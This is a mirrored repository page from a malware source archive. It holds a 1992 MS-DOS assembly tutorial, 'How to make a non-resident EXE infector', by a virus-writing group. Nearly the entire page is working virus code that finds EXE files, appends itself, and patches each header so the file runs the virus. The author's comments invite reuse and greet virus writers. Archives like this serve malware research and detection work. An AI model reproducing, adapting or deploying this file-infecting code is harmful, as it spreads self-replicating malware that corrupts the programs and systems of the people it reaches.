ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2024-12-18 17:36:11 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
6332d7096f
MalwareSourceCode/MSDOS/Virus.MSDOS.Unknown.torm-358.asm
vxunderground 3e7d2e8262
Add files via upload
2021-01-12 18:01:59 -06:00

160 lines
3.2 KiB
NASM
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

;
; Virus Lession #2 'How to make a non-resident EXE infector'
;
; (c) 1992 Tormentor // Demoralized Youth
;
; Well, I had not time to comment this code as much as I wanted to,
; but here you are.
; What can be hard to understand is the .EXE header changes, but if
; you look at the description on the header (ex: Norton guide Tech. Ref)
; you'll understand...
; Anyway, feel free to use this example and if you have any questions
; or anything call my board: Swedish Virus Labratory +46-3191-9393
;
; Greetings to all virus-writers!
;
; /Tormentor
;
.model tiny
.radix 16
.code
Virus_Lenght EQU Virus_End-Virus_Start ; Lenght of virus.
org 100
Virus_Start: call where_we_are
where_we_are: pop si
sub si,where_we_are-Virus_Start
mov ax,es
add ax,10
add ax,cs:[si+Exe_header-Virus_Start+16]
push ax
push cs:[si+Exe_header-Virus_Start+14]
push ds
push cs
pop ds
mov ah,1a
mov dx,offset Own_dta-Virus_Start
add dx,si
int 21
mov ah,4e ; We start to look for a *.EXE file
look4victim: mov dx,offset file_match-Virus_Start
add dx,si
int 21
jnc cont2
jmp no_victim_found ; If no *.EXE files was found.
cont2: mov ax,3d02
mov dx,Own_dta-Virus_Start+1e
add dx,si
int 21
jnc cont1
jmp cant_open_file
cont1: xchg ax,bx
mov ah,3f
mov cx,1c
mov dx,offset Exe_header-Virus_Start
add dx,si
int 21
jc read_error
cmp byte ptr ds:[si+Exe_header-Virus_Start],'M'
jnz no_exe ; !!! Some EXEs starts with ZM !!!
cmp word ptr ds:[si+Exe_header-Virus_Start+12],'DY'
jz infected
mov ax,4202 ; Go EOF
xor cx,cx
xor dx,dx
int 21
push dx
push ax
mov ah,40 ; Write virus to EOF.
mov cx,Virus_Lenght
mov dx,si
int 21
mov ax,4202 ; Get NEW filelenght.
xor cx,cx
xor dx,dx
int 21
mov cx,200
div cx
inc ax
mov word ptr ds:[Exe_header-Virus_Start+2+si],dx
mov word ptr ds:[Exe_header-Virus_Start+4+si],ax
pop ax
pop dx
mov cx,10
div cx
sub ax,word ptr ds:[Exe_header-Virus_Start+8+si]
mov word ptr ds:[Exe_header-Virus_Start+16+si],ax
mov word ptr ds:[Exe_header-Virus_Start+14+si],dx
mov word ptr ds:[Exe_header-Virus_Start+12+si],'DY'
mov ax,4200 ; Position file-pointer to begin of file
xor cx,cx
xor dx,dx
int 21
mov ah,40 ; Write header
mov cx,1c
mov dx,offset Exe_header-Virus_Start
add dx,si
int 21
jc write_error
no_exe:
infected:
mov ah,3e
int 21
Sick_or_EXE: mov ah,4f
jmp look4victim
write_error: ; Here you can test whats went wrong.
read_error: ; This is just for debugging purpose.
cant_open_file: ; These entries are equal to eachother
no_victim_found: ; but could be changed if you need to test something.
pop ds
retf
file_match db '*.EXE',0 ; Pattern to search for.
; Don't forget to end with 0 !
Exe_header db 16 DUP(0)
dw 0fff0 ; Adjustment just for this COM-file.
db 4 DUP(0)
notes db '(c) 1992 Tormentor / Demoralized Youth ',0a,0d
db 'Rather first in hell, than second in heaven.'
Own_Dta db 02bh DUP(0)
Virus_End EQU $
end Virus_Start

Reference in New Issue View Git Blame Copy Permalink